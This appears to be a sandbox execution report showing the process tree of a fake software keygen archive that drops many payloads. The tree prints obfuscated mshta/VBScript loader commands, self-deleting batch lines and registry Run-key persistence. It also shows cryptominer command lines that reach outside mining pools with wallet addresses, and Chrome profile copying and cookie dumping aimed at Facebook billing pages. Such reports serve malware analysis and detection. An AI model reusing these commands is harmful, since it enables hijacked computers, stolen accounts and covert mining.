                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe"
                                                                                                                                    1⤵
                                                                                                                                      PID:4788
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                        2⤵
                                                                                                                                          PID:4388
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                            keygen-pr.exe -p83fsase3Ge
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3692
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2208
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                5⤵
                                                                                                                                                  PID:4812
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                              keygen-step-1.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4992
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                              keygen-step-5.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3920
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                4⤵
                                                                                                                                                  PID:4184
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4820
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                        Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4328
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5144
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5364
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                              PID:5468
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                            6⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1448
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:4352
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\9800.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\9800.tmp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5392
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\9800.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5280
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5088
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5488
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              5⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:5580
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4832
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5324
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:5540
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2188
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:3324
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:412
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:2316
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\A1E3.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\A1E3.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:5640
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\A1E3.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\A1E3.tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5708
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\A3D8.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\A3D8.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:5648
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12786 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  PID:5832
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13863@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5944
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5128
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:5348
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  PID:5320
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5116
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:5212
                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:5188
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:5460
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc17f64f50,0x7ffc17f64f60,0x7ffc17f64f70
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4956
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1508 /prefetch:2
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5436
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2248 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5592
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2204 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:5620
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2548 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5920
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5936
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5932
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6064
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6056
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:6072
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,10306332651735144842,13767838087820503734,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4572
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        PID:5080
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4476
                                                                                                                                                                                        • C:\ProgramData\5477419.exe
                                                                                                                                                                                          "C:\ProgramData\5477419.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3724
                                                                                                                                                                                        • C:\ProgramData\2158635.exe
                                                                                                                                                                                          "C:\ProgramData\2158635.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:5292
                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5824
                                                                                                                                                                                        • C:\ProgramData\3060877.exe
                                                                                                                                                                                          "C:\ProgramData\3060877.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:516
                                                                                                                                                                                          • C:\ProgramData\3060877.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:4532
                                                                                                                                                                                        • C:\ProgramData\6380359.exe
                                                                                                                                                                                          "C:\ProgramData\6380359.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5004
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:5208
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:1040
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5576
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.serial.keys.gen.zip\Phatnoise.Music.Manager.all.ve.serial.keys.gen.exe"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:6016
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4888
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
                                                                                                                                                                                          keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5160
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4852
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4468
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
                                                                                                                                                                                            keygen-step-1.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4460
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
                                                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5184
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:1104
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:6136
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4196
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\40A4.tmp.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\40A4.tmp.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:5888
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\40A4.tmp.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\40A4.tmp.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:5252
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4393.tmp.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4393.tmp.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:5796
                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12919 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  PID:5412
                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w28564@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:5812
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:5728
                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                      PID:4316
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3236
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:5552
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                        6⤵
